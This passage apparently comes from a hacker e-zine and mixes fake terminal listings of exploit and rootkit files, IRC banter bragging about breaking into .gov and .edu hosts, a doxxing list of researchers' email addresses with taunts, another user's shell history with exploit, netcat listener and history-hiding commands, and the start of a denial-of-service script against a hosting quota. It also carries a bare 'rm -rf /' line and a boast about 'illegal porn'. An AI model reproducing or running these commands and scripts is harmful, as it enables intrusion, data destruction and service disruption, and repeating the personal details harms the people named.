-rwxr-xr-x 1 root wheel 2880000 ISSv4.R11
-rwxr-xr-x 1 root wheel 2880000 ISSv4.R12
-rwxr-xr-x 1 root wheel 2880000 ISSv4.R13
-rwxr-xr-x 1 root wheel 2809651 ISSv4.R14
-rwxr-xr-x 1 root wheel 2880000 ISSv4.RAR
-rwxr-xr-x 1 root wheel 2177360 InstallShockmachine.EXE
-rwxr-xr-x 1 root wheel 11264 Jonathan_Bowie_Resume.doc
-rwxr-xr-x 1 root wheel 4 MSDOS.---
-r-xr-xr-x 1 root wheel 1664 MSDOS.SYS
drwxr-xr-x 1 root wheel 32768 MSVS98
-rwxr-xr-x 1 root wheel 679673856 Mandrake81-cd1-inst.i586.iso
drwxr-xr-x 1 root wheel 32768 Music
drwxr-xr-x 1 root wheel 32768 My Documents
drwxr-xr-x 1 root wheel 32768 My Music
-rwxr-xr-x 1 root wheel 32768 NBA Jam 2000 (U) [!].mpk
-rwxr-xr-x 1 root wheel 16777216 NBA Jam 2000 (U) [!].v64
drwxr-xr-x 1 root wheel 32768 NCDTREE
-rwxr-xr-x 1 root wheel 16211 NETLOG.TXT
-rwxr-xr-x 1 root wheel 45992492 Nas & Puff Daddy - Hate Me Now.wav
drwxr-xr-x 1 root wheel 32768 NovaLogic
-rwxr-xr-x 1 root wheel 358842368 OpenBSD30-i386-base-ipf.iso
-rwxr-xr-x 1 root wheel 2527 PCcheck.LOG
drwxr-xr-x 1 root wheel 32768 PSA Stuff
drwxr-xr-x 1 root wheel 32768 Program Files
-rwxr-xr-x 1 root wheel 1448 README.TXT
-rwxr-xr-x 1 root wheel 86016 REGMON.EXE
-rwxr-xr-x 1 root wheel 13232 REGMON.HLP
-rwxr-xr-x 1 root wheel 22576 REGSYS.SYS
-rwxr-xr-x 1 root wheel 23143 REGVXD.VXD
drwxr-xr-x 1 root wheel 32768 Recycled
-rwxr-xr-x 1 root wheel 445 SCANDISK.LOG
-rwxr-xr-x 1 root wheel 189869 SETUPLOG.TXT
-rwxr-xr-x 1 root wheel 6889472 SSHWinClient-3.1.0-build235.exe
-rwxr-xr-x 1 root wheel 5166 SUHDLOG.DAT
-rwxr-xr-x 1 root wheel 544800 SYSTEM.1ST
drwxr-xr-x 1 root wheel 32768 Shit Talker v1.2
drwxr-xr-x 1 root wheel 32768 Sketcher
drwxr-xr-x 1 root wheel 32768 SoftIce
drwxr-xr-x 1 root wheel 32768 Sonja Songs
drwxr-xr-x 1 root wheel 32768 Temp
-rwxr-xr-x 1 root wheel 261876069 TheSims.rar
-rwxr-xr-x 1 root wheel 4159692 Traci - Deep_Inside_Traci _Lords.mov
-rwxr-xr-x 1 root wheel 10986500 Tracy n Ron.mpg
-rwxr-xr-x 1 root wheel 1667960 Untitled-1.psd
-rwxr-xr-x 1 root wheel 1167628 Untitled-2.psd
-rwxr-xr-x 1 root wheel 49152 VIDEOROM.BIN
drwxr-xr-x 1 root wheel 32768 Valerie2
drwxr-xr-x 1 root wheel 32768 WAVs
drwxr-xr-x 1 root wheel 32768 WINDOWS
drwxr-xr-x 1 root wheel 32768 WINWORD
-rwxr-xr-x 1 root wheel 62 WS_FTP.LOG
drwxr-xr-x 1 root wheel 32768 Winzip
drwxr-xr-x 1 root wheel 32768 _RESTORE
drwxr-xr-x 1 root wheel 32768 acadtemp
drwxr-xr-x 1 root wheel 32768 acidwarp
-rwxr-xr-x 1 root wheel 669935 anarchy.txt
-rwxr-xr-x 1 root wheel 931004 anarchyv5.zip
-rwxr-xr-x 1 root wheel 731617 audc20.exe
-rwxr-xr-x 1 root wheel 224 autoexec.nav
-rwxr-xr-x 1 root wheel 1120 baseclasses.log
-rwxr-xr-x 1 root wheel 647181 bee.txt
drwxr-xr-x 1 root wheel 32768 bill
-rwxr-xr-x 1 root wheel 403916 bing-j.jpg
-rwxr-xr-x 1 root wheel 488217 bing1-j.jpg
-rwxr-xr-x 1 root wheel 1459 blah
-rwxr-xr-x 1 root wheel 177298 bombs.zip
drwxr-xr-x 1 root wheel 32768 cable modems - breaks the lancity modem cap
-rwxr-xr-x 1 root wheel 2378 cart.html
drwxr-xr-x 1 root wheel 32768 caseyxmas
-rwxr-xr-x 1 root wheel 9771787 cdjd.exe
-rwxr-xr-x 1 root wheel 402789 cj_7979.wmv
drwxr-xr-x 1 root wheel 32768 contrib
-rwxr-xr-x 1 root wheel 644608 cookbook97.doc
-rwxr-xr-x 1 root wheel 97458 corn029[1].zip
drwxr-xr-x 1 root wheel 32768 cripto
-rwxr-xr-x 1 root wheel 159258 csircd-1.13.tar.gz
-rwxr-xr-x 1 root wheel 127502 curt-mosiac.jpg
-rwxr-xr-x 1 root wheel 1629844 curt-mosiac.psd
drwxr-xr-x 1 root wheel 32768 cygwin
-rwxr-xr-x 1 root wheel 163437 data1024.dbb
-rwxr-xr-x 1 root wheel 173396 data256.dbb
-rwxr-xr-x 1 root wheel 9303 data4096.dbb
drwxr-xr-x 1 root wheel 32768 dc-ufc
drwxr-xr-x 1 root wheel 32768 dcstuff
drwxr-xr-x 1 root wheel 32768 decoded
drwxr-xr-x 1 root wheel 32768 deusex
-rwxr-xr-x 1 root wheel 8769 dod.nfo
-rwxr-xr-x 1 root wheel 34179 download.cgi
-rwxr-xr-x 1 root wheel 20000000 e-cp2k.001
-rwxr-xr-x 1 root wheel 337 e-cp2k.sfv
-rwxr-xr-x 1 root wheel 20000000 e-gta2dc.001
-rwxr-xr-x 1 root wheel 20000000 e-hoylec.001
-rwxr-xr-x 1 root wheel 18456576 e-sf3rds.001
-rwxr-xr-x 1 root wheel 18268 e_nav2001be.zip
-rwxr-xr-x 1 root wheel 468087 ec2t2.exe
-rwxr-xr-x 1 root wheel 1248 envja6hw.sys
-rwxr-xr-x 1 root wheel 1248 envjawt3.sys
-rwxr-xr-x 1 root wheel 414 file_id.diz
-rwxr-xr-x 1 root wheel 632485888 flwpro.iso
drwxr-xr-x 1 root wheel 32768 ftproot
-rwxr-xr-x 1 root wheel 2407 g_lps_ies[1].zip
-rwxr-xr-x 1 root wheel 11070 gr_Budswell Stoner.current
-rwxr-xr-x 1 root wheel 7135 gr_Budswell Stoner.previous
drwxr-xr-x 1 root wheel 32768 hacker
-rwxr-xr-x 1 root wheel 267526 hamilton.bmp
-rwxr-xr-x 1 root wheel 74416 hamilton.psf
-rwxr-xr-x 1 root wheel 840 hydro.txt
drwxr-xr-x 1 root wheel 32768 ida
drwxr-xr-x 1 root wheel 32768 ios
-rwxr-xr-x 1 root wheel 1871 ip.txt
-rwxr-xr-x 1 root wheel 394069 j.jpg
-rwxr-xr-x 1 root wheel 20000000 kal-ths2.001
-rwxr-xr-x 1 root wheel 24576 kill_cih.exe
drwxr-xr-x 1 root wheel 32768 latest
-rwxr-xr-x 1 root wheel 12555 lp-shop.html
drwxr-xr-x 1 root wheel 32768 mIRC
drwxr-xr-x 1 root wheel 32768 mame
-rwxr-xr-x 1 root wheel 20875 marb.jpg
drwxr-xr-x 1 root wheel 32768 master_of_orion_2
-rwxr-xr-x 1 root wheel 7737584 mjb51149enu.exe
drwxr-xr-x 1 root wheel 32768 mp3z
-rwxr-xr-x 1 root wheel 98 mp_.current
-rwxr-xr-x 1 root wheel 90 mp_.previous
-rwxr-xr-x 1 root wheel 10 mp_Budswell Stoner.current
-rwxr-xr-x 1 root wheel 50 mp_Budswell Stoner.previous
-rwxr-xr-x 1 root wheel 17488 msiexec.ex_
drwxr-xr-x 1 root wheel 32768 msme
drwxr-xr-x 1 root wheel 32768 na2002
-rwxr-xr-x 1 root wheel 0 nav80try.exe
-rwxr-xr-x 1 root wheel 4869253 netzero.exe
-rwxr-xr-x 1 root wheel 10001569 nortonpersonalfirewall2001_2.5_en-us.rar
-r-xr-xr-x 1 root wheel 34420 ntdetect.com
-rwxr-xr-x 1 root wheel 13196572 nticdmaker508full[1].zip
-r-xr-xr-x 1 root wheel 213904 ntldr
drwxr-xr-x 1 root wheel 32768 officeinst
drwxr-xr-x 1 root wheel 32768 opennap
-rwxr-xr-x 1 root wheel 598 os581474.bin
drwxr-xr-x 1 root wheel 32768 ps.tmp
-rwxr-xr-x 1 root wheel 147456 pscp-x86.exe
-rwxr-xr-x 1 root wheel 8076 rcdet.txt
-rwxr-xr-x 1 root wheel 174460928 rq_ext1.mpg
drwxr-xr-x 1 root wheel 32768 sb3
-rwxr-xr-x 1 root wheel 32059 self-igniting.txt
drwxr-xr-x 1 root wheel 32768 shockwave4kc
-rwxr-xr-x 1 root wheel 703368 shockwaveinstaller.exe
-rwxr-xr-x 1 root wheel 258668 shoutcast-1-8-3-windows.exe
drwxr-xr-x 1 root wheel 32768 snort-1.7-win32-static
drwxr-xr-x 1 root wheel 32768 sol7-pkgs
drwxr-xr-x 1 root wheel 32768 sony
drwxr-xr-x 1 root wheel 32768 source
drwxr-xr-x 1 root wheel 32768 sta
drwxr-xr-x 1 root wheel 32768 stuf
drwxr-xr-x 1 root wheel 32768 tp2002
-r-xr-xr-x 1 root wheel 379906 txtsetup.sif
drwxr-xr-x 1 root wheel 32768 untitled
drwxr-xr-x 1 root wheel 32768 vctut
drwxr-xr-x 1 root wheel 32768 wftpd
-rwxr-xr-x 1 root wheel 2412 whatsnew.txt
-rwxr-xr-x 1 root wheel 3644834 winamp2666_u2.exe
drwxr-xr-x 1 root wheel 32768 xinstall
drwxr-xr-x 1 root wheel 32768 zoo
drwxr-xr-x 1 root wheel 32768 zsnesw
<r0b1nleech> We didn't start the fire is a GAY song.
<jobe> should i show my special porn dir?
<jobe> let me grep out a few things in the ls
$ ls -al porn
DUE TO THE DISGUSTING NATURE OF THIS LS, WE HAVE FORBID OURSELVES TO SHOW IT.
<r0b1nleech> Disgusting..
<r0b1nleech> You are sick.
<jobe> :D:D:D:D:D:D:D
<r0b1nleech> Chunks of caviar, on the floor, and on my leg.
$ w
USER TTY FROM LOGIN@ IDLE WHAT
root v0 - Wed04PM 2days xinit /root/.xinitrc -
root p0 :0.0 Wed04PM 6:49 csh
root p1 :0.0 Wed04PM 5:11 ssh -C -l jobe -c 3des
root p2 :0.0 Wed06PM 7:58 vi sparc-solaris
root p3 :0.0 Wed06PM 4:06 ssh -C -l jobe -c 3des
root p4 :0.0 Thu05AM 1day vi test_sol_login.c
root p5 :0.0 Thu05AM 4:06 bash
root p6 :0.0 Thu01PM 4:12 csh
root p7 :0.0 Thu02PM 1day csh
root p8 :0.0 Fri11AM 4:06 csh
r0b1n v1 - Fri11AM - w
$ ls -al /root
drwxr-xr-x 33 root wheel 4096 .
drwxr-xr-x 22 root wheel 512 ..
-rw------- 1 root wheel 191 .Xauthority
-rw------- 1 root wheel 625 .althearc
-rw------- 1 root wheel 63035 .bash_history
-rw-r--r-- 2 root wheel 802 .cshrc
drwxr-xr-t 2 root wheel 512 .esd
drwxr-xr-x 2 root wheel 512 .ethereal
drwxr-xr-x 4 root wheel 512 .gnapster
-rw------- 1 root wheel 3013 .history
-rw-r--r-- 1 root wheel 142 .klogin
drwx------ 2 root wheel 512 .kza
-rw-r--r-- 1 root wheel 297 .login
drwxr-xr-x 3 root wheel 512 .mozilla
drwx------ 4 root wheel 512 .netscape
-rw------- 1 root wheel 44 .poppyrc
-rw-r--r-- 2 root wheel 251 .profile
drwx------ 2 root wheel 512 .ssh
drwxr-xr-x 2 root wheel 512 .ssh2
-rw-r--r-- 1 root wheel 5101 .suids
lrwxr-xr-x 1 root wheel 12 .wine -> /stuff/.wine
-rw-r--r-- 1 root wheel 464 .wmpop3rc
drwxr-xr-x 2 root wheel 512 .xine
-rwxr-xr-x 1 root wheel 108 .xinitrc
drwxr-xr-x 4 root wheel 512 .xmms
-rwxr-xr-x 1 root wheel 108 .xsession
drwxr-xr-x 2 root wheel 512 7350cfingerd
-rw-r--r-- 1 root wheel 19713 7350cfingerd-0.0.4.tar.gz
-rw-r--r-- 1 root wheel 414316 CURRENT.tar.gz
-rw-r--r-- 1 root wheel 3840 Changelog
-rw-r--r-- 1 root wheel 4781 Collector-1.0.tar.gz
-rw-r--r-- 1 root wheel 90 FILE_ID.DIZ
drwxr-xr-x 5 root wheel 512 GNUstep
-rw-r--r-- 1 root wheel 7655 Hunter-1.2.tar.gz
-rw-r--r-- 1 root wheel 7011 ICMP-Tunnel_P4-1.0.tar.gz
drwx------ 2 root wheel 512 Mail
-rw-r--r-- 1 root wheel 3805 Makefile
-rw-r--r-- 1 root wheel 2252 README
-rw-r--r-- 1 root wheel 6246 Searcher-8.0.tar.gz
-rw-r--r-- 1 root wheel 16744 Smeagol-4.4.4.tar.gz
drwxr-xr-x 3 root wheel 1024 StMichael_LKM-0.08
-rw-r--r-- 1 root wheel 30545 StMichael_LKM-0.08.tar.gz
-rw-r--r-- 1 root wheel 903514 V8.pdf
-rw------- 1 root wheel 864256 XF86_SVGA.core
-rwxr-xr-x 1 root wheel 6415 abo10
-rw-r--r-- 1 root wheel 224 abo10.c
-rwxr-xr-x 1 root wheel 50589 abo2
-rw-r--r-- 1 root wheel 381 abo2.c
-rwxr-xr-x 1 root wheel 4461 abo2.new
-rwxr-xr-x 1 root wheel 4606 abo3
-rw-r--r-- 1 root wheel 433 abo3.c
-rwxr-xr-x 1 root wheel 4546 abo3.new
-rwxr-xr-x 1 root wheel 4843 abo4
-rw-r--r-- 1 root wheel 495 abo4.c
-rwxr-xr-x 1 root wheel 6228 abo5
-rw-r--r-- 1 root wheel 632 abo5.c
-rw------- 1 root wheel 294912 abo5.core
-rwxr-xr-x 1 root wheel 15470 abo6
-rw-r--r-- 1 root wheel 371 abo6.c
-rw------- 1 root wheel 8329 abo6.ktrace
-rwxr-xr-x 1 root wheel 4580 abo6.new
-rwxr-xr-x 1 root wheel 6134 abo7
-rw-r--r-- 1 root wheel 90 abo7.c
-rwxr-xr-x 1 root wheel 8404 abo8
-rw-r--r-- 1 root wheel 252 abo8.c
-rwxr-xr-x 1 root wheel 6176 abo9
-rw-r--r-- 1 root wheel 191 abo9.c
drwxr-xr-x 3 root wheel 512 adore
-rw-r--r-- 1 root wheel 14749 adore-0.42.tgz
-rw-r--r-- 1 root wheel 46403 b00s
-rw-r--r-- 1 root wheel 0 blah
-rw-r--r-- 1 root wheel 258 bll
-rw-r--r-- 1 root wheel 6401 boink.c
-rw-r--r-- 1 root wheel 445006 bz.hosts
-rwxr-xr-x 1 root wheel 4235 call
-rw-r--r-- 1 root wheel 32 call.c
-rw-r--r-- 1 root wheel 3339 clear-1.3.tar.gz
-rwxr-xr-x 1 root wheel 12239 cmsd
-rw-r--r-- 1 root wheel 1872 cnt-svr-filetransfer.tar.gz
-rw-r--r-- 1 root wheel 1438 daemonshell.tar.gz
drwxr-xr-x 2 root wheel 512 data
-rw-r--r-- 1 root wheel 273 done.up
-rw-r--r-- 1 root wheel 635195 edu
-rwxr-xr-x 1 root wheel 6018 er
-rw-r--r-- 1 root wheel 2845 errors
-rwxr-xr-x 1 root wheel 11146 ex_abo2
-rw-r--r-- 1 root wheel 1044 ex_abo2.c
-rwxr-xr-x 1 root wheel 4925 ex_abo3
-rw-r--r-- 1 root wheel 768 ex_abo3.c
-rwxr-xr-x 1 root wheel 4957 ex_abo4
-rw-r--r-- 1 root wheel 844 ex_abo4.c
-rwxr-xr-x 1 root wheel 10856 ex_abo5
-rw-r--r-- 1 root wheel 1272 ex_abo5.c
-rw------- 1 root wheel 21092 ex_abo5.out
-rwxr-xr-x 1 root wheel 4888 ex_abo6
-rw-r--r-- 1 root wheel 1268 ex_abo6.c
-rw------- 1 root wheel 16005 ex_abo6.out
-rwxr-xr-x 1 root wheel 4844 ex_abo7
-rw-r--r-- 1 root wheel 1183 ex_abo7.c
-rw------- 1 root wheel 15698 ex_abo7.out
-rwxr-xr-x 1 root wheel 5175 ex_abo8
-rw-r--r-- 1 root wheel 1358 ex_abo8.c
-rw------- 1 root wheel 8023 ex_abo8.out
-rwxr-xr-x 1 root wheel 4536 ex_fsx6
-rw-r--r-- 1 root wheel 181 ex_fsx6.c
-rw-r--r-- 1 root wheel 1390 exec_race.c
-rw-r--r-- 1 root wheel 5475 fawx.c
drwxr-xr-x 2 root wheel 512 fhffp
-rw-r--r-- 1 root wheel 0 file
-rw-r--r-- 1 root wheel 2937 fingerd-fileserver.tar.gz
-rwxr-xr-x 1 root wheel 4685 forktest
-rw-r--r-- 1 root wheel 239 forktest.c
-rwxr-xr-x 1 root wheel 6083 fstring
-rw-r--r-- 1 root wheel 91 fstring.c
-rwxr-xr-x 1 root wheel 7999 fsx6
-rw-r--r-- 1 root wheel 413 fsx6.c
-rwxr-xr-x 1 root wheel 6134 gabo7
-rw-r--r-- 1 root wheel 1790 gdb.txt
-rw-r--r-- 1 root wheel 11629 generic.h
-rw-r--r-- 1 root wheel 8501 ici.out
-rw-r--r-- 1 root wheel 11852 in.telnetd
drwxr-xr-x 2 root wheel 512 iob
-rw-r--r-- 1 root wheel 5899 iob-0.1.tar.gz
-rwxr-xr-x 1 root wheel 6499 killwin
-rw-r--r-- 1 root wheel 1771 killwin.c
-rw-r--r-- 1 root wheel 29 kr.hosts
-rw------- 1 root wheel 72 ktrace.out
drwxr-xr-x 2 root wheel 512 kza-0.401
drwx------ 2 root wheel 512 kza-downloads
-rw-r--r-- 1 root wheel 294517 kza.linux.tar.gz
-rwxr-xr-x 1 root wheel 9911 loginex
-rw-r--r-- 1 root wheel 7650 loginex.c
drwxr-xr-x 2 root wheel 512 mtv
-rw-r--r-- 1 root wheel 258322 mtv-1.0.8.0.tar.gz
-rw-r--r-- 1 root wheel 75267 nc110.tgz
-rw-r--r-- 1 root wheel 2645 netcat.blurb
-rw-r--r-- 1 root wheel 58553 netcat.c
drwx------ 7 root wheel 512 ninja-1.5.7
-rw-r--r-- 1 root wheel 693696 ninja-1.5.7.tar.gz
-rw-r--r-- 1 root wheel 693696 ninja-src.tar.gz
drwxr-xr-x 6 root wheel 6656 openssh-3.0.2p1
-rw-r--r-- 1 root wheel 781092 openssh-3.0.2p1.tar.gz
-rwxr-xr-x 1 root wheel 4671 passprog
-rw-r--r-- 1 root wheel 479 passprog.c
-rwxr-xr-x 1 root wheel 6270 passtest
-rw-r--r-- 1 root wheel 2004 passtest.c
-rw------- 1 root wheel 11650 passtest.out
-rw-r--r-- 1 root wheel 1684 paz-1.0.tar.gz
-rwxr-xr-x 1 root wheel 9477 pepsi
-rw-r--r-- 1 root wheel 7215 pepsi.c
-rwxr-xr-x 1 root wheel 6267 pinger
-rw-r--r-- 1 root wheel 3013 pinger.c
-rw-r--r-- 1 root wheel 2770 probe-2.3.tar.gz
-rw-r--r-- 1 root wheel 54184 qcrack-1.02.tar.gz
-rw-r--r-- 1 root wheel 121423 roseposter.jpg
-rwxr-xr-x 1 root wheel 5116 sc
-rw-r--r-- 1 root wheel 327 sc.c
drwxr-xr-x 2 root wheel 512 screamingCobra-1.04
drwxr-xr-x 2 root wheel 512 scripts
-rwxr-xr-x 1 root wheel 4352 sizint
-rw-r--r-- 1 root wheel 101 sizint.c
-rw-r--r-- 1 root wheel 378 sol-ffcore.sh
-rw-r--r-- 1 root wheel 12091 solsparc_rpc.cmsd.c
-rwxr-xr-x 1 root wheel 9832 sparc_login
-rw-r--r-- 1 root wheel 8598 sparc_login.c
-rw------- 1 root wheel 299008 sparc_login.core
-rwxr-xr-x 1 root wheel 24444 sparc_login2
-rw------- 1 root wheel 299008 sparc_login2.core
drwxr-xr-x 4 root wheel 3072 ssh-1.2.32
-rw-r--r-- 1 root wheel 1030240 ssh-1.2.32.tar.gz
drwxr-xr-x 5 root wheel 1024 ssh-2.4.0
-rw-r--r-- 1 root wheel 1911375 ssh-2.4.0.tar.gz
-rw-r--r-- 1 root wheel 14368 statdx2.c
-rw-r--r-- 1 root wheel 5856 statdx2.tar.gz
-rwxr-xr-x 1 root wheel 8549 stupidh
-rwxr-xr-x 1 root wheel 7797 syndrop
-rw-r--r-- 1 root wheel 7900 syndrop.c
-rwxr-xr-x 1 root wheel 5086 t
-rw-r--r-- 1 root wheel 6360 t-shirt-4.0.tar.gz
-rw-r--r-- 1 root wheel 2123 t3.c
-rw-r--r-- 1 root wheel 2843 tao.c
-rw-r--r-- 1 root wheel 34692 targa.c
-rwxr-xr-x 1 root wheel 4351 test
-rw-r--r-- 1 root wheel 303 test.c
-rw------- 1 root wheel 282624 test.core
-rwxr-xr-x 1 root wheel 12267 test_sol_login
-rw-r--r-- 1 root wheel 13357 test_sol_login.c
-rwxr-xr-x 1 root wheel 5875 testsc
-rw-r--r-- 1 root wheel 864 testsc.c
-rwxr-xr-x 1 root wheel 8322 testsh
-rw-r--r-- 1 root wheel 120 testsh.c
-rwxr-xr-x 1 root wheel 4579 teststat
-rw-r--r-- 1 root wheel 231 teststat.c
-rw-r--r-- 1 root wheel 68401 thc-uht1.tgz
-rw-r--r-- 1 root wheel 11936 udpd
-rw-r--r-- 1 root wheel 3330 udpsh.tar.gz
drwxr-xr-x 2 root wheel 512 udpshell
-rw-r--r-- 1 root wheel 1124 w00p
drwxr-xr-x 3 root wheel 512 work
-rwxr-xr-x 1 root wheel 13720 x2
drwxr-xr-x 7 root wheel 1024 xpdf-1.00
-rw-r--r-- 1 root wheel 397750 xpdf-1.00.tar.gz
-rw------- 1 root wheel 839680 xterm.core
drwxr-xr-x 2 root wheel 512 zap3
-rw-r--r-- 1 root wheel 3176 zap3.tar.gz
<r0b1nleech> I can't help but notice but what is that kr.hosts file? And
+ bz.hosts?
<jobe> those are lp's, f0r wh3n i h4ck shit
<jobe> i use udpshell on everything i own
<r0b1nleech> Looks like you are a fan of gera (a w00w00 patriot) and his
+ advanced buffer overflow challenges.
<jobe> i've mastered all of them!
<jobe> sparc_login.c is my solaris login exploit
<jobe> i hack .gov's and .edu's with it
<jobe> well me and jduck
<jduck> i hacked the entire internet with my dtspcd and jobe's solaris login
+ exploit.
$ ls -al ~j
drwxr-xr-x 11 j j 2048 .
drwxr-xr-x 23 root wheel 512 ..
-rw-r--r-- 1 root jduck 1735738 .pw.pu
drwx------ 2 j j 512 .ssh
-rw-r--r-- 1 j j 171542 2k.more
-rw-r--r-- 1 j j 22605 600.more
drwxr-xr-x 2 root wheel 1024 ADMmutate-0.8.4
-rw-r--r-- 1 j j 29108 ADMmutate-0.8.4.tar.gz
drwx------ 2 root wheel 512 ASMCODES-1.0.2
-rw-r--r-- 1 j j 2526 ChangeLog
drwxr-xr-x 2 1852 25 512 ILINXR.install
-rw-r--r-- 1 root j 15000000 Patriots.VS.Steelers.AFC.Chapionship.DiVX.CD1.001.r00
-rw-r--r-- 1 root j 15000000 Patriots.VS.Steelers.AFC.Chapionship.DiVX.CD1.001.r01
-rw-r--r-- 1 root j 15000000 Patriots.VS.Steelers.AFC.Chapionship.DiVX.CD1.001.r02
-rw-r--r-- 1 root j 15000000 Patriots.VS.Steelers.AFC.Chapionship.DiVX.CD1.001.r03
-rw-r--r-- 1 root j 319488 Patriots.VS.Steelers.AFC.Chapionship.DiVX.CD1.001.r04
-rw-r--r-- 1 j j 469 README.513
-rw-r--r-- 1 j j 8250103 VSC513.tar.Z
-rw-r--r-- 1 j j 7069 VSCR513.ps.Z
-rw-r--r-- 1 j j 103743 VSCU513.ps.Z
-rw-r--r-- 1 j j 14101 asmcodes-1.0.2.tar.gz
-rw------- 1 root j 32333 b00
-rw-r--r-- 1 j j 7192 b1nd
-rw-r--r-- 1 j j 18436 bb
drwxr-xr-x 5 root wheel 1024 binutils-020210
-rw-r--r-- 1 root wheel 57057280 binutils.tar
-rwxr-x--- 1 j j 851 cisco-tools
-rw-r--r-- 1 j j 243312 core
-rw-r--r-- 1 j j 1262996 dbx-sparc.gz
-rwxr-xr-x 1 root j 14012 discover
-rw-r--r-- 1 j j 3424 discover.c
-rw-r--r-- 1 root jduck 84967 edu.tld
-rwxr-xr-x 1 root j 6018 er
-rw-r--r-- 1 root j 3574 errors
drwx------ 18 220 1002 1024 gcc-teso
-rw-r--r-- 1 root j 14270640 gcc-teso.tar.gz
-rw-r--r-- 1 j j 9801816 gdb
-rwxr-xr-x 1 j j 334 get_pg.pl
-rw-r--r-- 1 root j 19214 hello
-rw-r--r-- 1 root j 83 hello.c
-rw-r--r-- 1 root j 864 hello.o
-rw-r--r-- 1 j j 1489931 includes.tar.gz
-rw-r--r-- 1 j j 2285137 jobe.wl
-rw-r--r-- 1 j j 24292 kcms_configure
-rw------- 1 root j 1028096 ld.core
-rw-r--r-- 1 root j 6036 ld.help
-rw-r--r-- 1 root wheel 6144813 linux-ar-405.tar.gz
-rwxr-xr-x 1 j j 29292 login
-rw-r--r-- 1 j j 1607 login.c
-rwxr-xr-x 1 root j 10099 loginex
-rw-r--r-- 1 j j 7871 loginex.c
-rw-r--r-- 1 j j 10344 m00
-rw-r--r-- 1 j j 75867384 ogls
-rw------- 1 j j 7918 pcnfsd-priv.tar.gz
drwxr-xr-x 2 root wheel 512 pcnfsd_remote
-rw-r--r-- 1 root jduck 66 pos.vuln.nets
drwxr-xr-x 2 root wheel 1024 qcrack-1.02
-rw-r--r-- 1 j j 1489778 sol7-includes.tar.gz
-r--r----- 1 j j 125208178 solaris-2.5.1+wings+ow.tar.gzd
-rwxr-xr-x 12 root wheel 512 src
-rw-r-xr-x 1 j j 229180 sshd
-rw-r--r-- 1 root j 45 stuff
-rwxr-xr-x 1 root j 4698 test_ws
-rw-r--r-- 1 root j 182 test_ws.c
-rw-r--r-- 1 root j 3330 udpsh.tar.gz
-rw-r--r-- 1 j j 10344 uf
-rw-r--r-- 1 j j 7028 uf.c
-rw-r--r-- 1 j j 9684 uf2
-rw-r--r-- 1 j j 9956 w00f
-rw-r--r-- 1 root j 2219 w00f.c
-rw-r--r-- 1 root j 44802 w00pe
-rw-r--r-- 1 root j 48755 w00pe2
-rw-r--r-- 1 j j 2272606 w00t
-rwxr-xr-x 1 j j 3568 wuftpfmt.pl
-rw-r--r-- 1 j j 9084 z2
-rw-r--r-- 1 root j 6458 z3.c
-rw-r--r-- 1 root j 8276 z3.o
-rw-r--r-- 1 root j 13793 z3.s
<jobe> w00t are all dtspcd hosts that i scanned out
<jobe> fresh for hacking
<jobe> .pw.uu is my sniff log that i keep hidden
<jobe> and Patriots.Vs.Steelers is really illegal porn
<r0b1nleech> Absolutely amazing.
# rm -rf / #
* >seifried #core02 wonders what chium forgot to p[atch
<nein> :|
<chiun> patch what?
<chiun> he must've sniffed my passwords
<seifried> you use cleartyext passwords? erk
<chiun> no
<chiun> i might have used a trojanned ssh client somewhere
<seifried> sux to be you
<seifried> how'd he get the root password for su though
<seifried> he/she/it
<chiun> no idea
<chiun> looking now
SignOff chiun: #cdc,#core02,#phrack,#teen (Ping Timeout: 400 Seconds)
.~e~----------------------------------------------------------~e~.
; *11* phrack staff demystified -- ThE UNiX TeRRoRiZt ;
`----------------------------------------------------------------'
ThE UNiX TeRRoRiZt brings you "PHRACK STAFF DEMYSTIFIED!":
----------------------------------------------------------
krahmer@cs.uni-potsdam.de <-- SuSe fire this guy!
edi@ganymed.org
tmogg@zigzag.pl
paul@boehm.org
crontab@netway.at
palmers@segfault.net
lorian@hert.org
caddis@hackforthedole.au.com <-- ISS fire this guy!
gaius@hert.org
scut@nb.in-berlin.de
hendy@teso.scene.at <-- I use your utmp cloaker!
just@segfault.net
halvar@gmx.de <-- Know Your Enemy!
zip@james.kalifornia.com <-- ISS fire this guy!
lists@immutec.com
acpizer@unseen.org
skyper@segfault.net <-- Hacks from segfault!
gamma@segfault.net
kil3r@hert.org
route@infonexus.com <-- Wrote a stupid book!
ThE UNiX TeRRoRiZt brings you "BONUS COVERAGE OF SKYPER HACKING!":
------------------------------------------------------------------
# cat ~skyper/.bash_history
ssh www.cnn.com
set
echo $RESOLV_HOST_CONF
ls
tar xfvz ADMglibcsh.tar.gz
strings resolv/res_hconf.c
./ADMglibcsh
ls -al /tmp/.sh
rm /tmp/.sh
ls
exit
top
su la-. lhendy
wow
echo "dfusLL#d" >doze.pwd
ls -al doze.pwd
chmod go-r doze.pwd
nc -l -p 1024
whereis nc
netcat
which nc
which netcat
netstat -ant
nc -l -p 31339 >ircs_coredump_cert.pem
unset HISTFILE
exit
.~e~----------------------------------------------------------~e~.
; *12* gobble blaster -- uncle m4v1s ;
`----------------------------------------------------------------'
#!/bin/sh
# own-gobbles
# by uncle m4v1s
#
# th1z skr1pt takez 4dv4ntag3 0f a kn0wn d0s 0n a gr0up
# 0f sekur1ty whiteh@ l4m3rz kn0wn as G0BBLEZ
# 3ver s1nce th31r l4m4ss st0rmh0st1ng pr0v1d3r wuz 0wned
# & fear1ng 4 th31r l1v3z th@ ADM wuz g01ng 2 k1ll th3m
# r0n1n struck up a d34l w/ a fr33 h0st3r.
# pr0blem 1z th0 they h4v3 qu0taz.
# run th1z, h3lp d0 ur part 2 erad1k8 l4m3rz!!!!!!
#
# Reviewer summary: the script mirrors one web site recursively, over and
# over, until the site's front page contains the word "exceeded". By the
# author's own header this is a denial-of-service loop aimed at a hosting
# quota.
# NOTE(review): presumably "exceeded" is text from the hoster's
# quota-exceeded page; that page is not shown here, so confirm before
# relying on it as an indicator.
# Seen from the serving side, the loop amounts to back-to-back full-site
# crawls from a single client. Per-client rate limiting, a cache in front of
# the origin and alerting on quota consumption are the usual controls.

# Assigned but never read below; every command hard-codes the URL instead.
HTTP_DOMAIN=http://www.bugtraq.org
# Client programs, resolved through PATH at run time.
CMD_LYNX=lynx
CMD_WGET=wget
# Initial value only; overwritten by the first probe before the loop tests it.
SITE_RESPONSE=1
# Fixed, predictable path under /tmp. Whatever already exists at this path is
# deleted without confirmation by the unquoted rm -rf calls below.
DUMP_PATH=/tmp/GOBBLES
echo uncle m4v1s gonna buzt s0me headz
echo remember 2 add th1z skr1pt 2 ur m0nthly kr0nj0b
rm -rf $DUMP_PATH
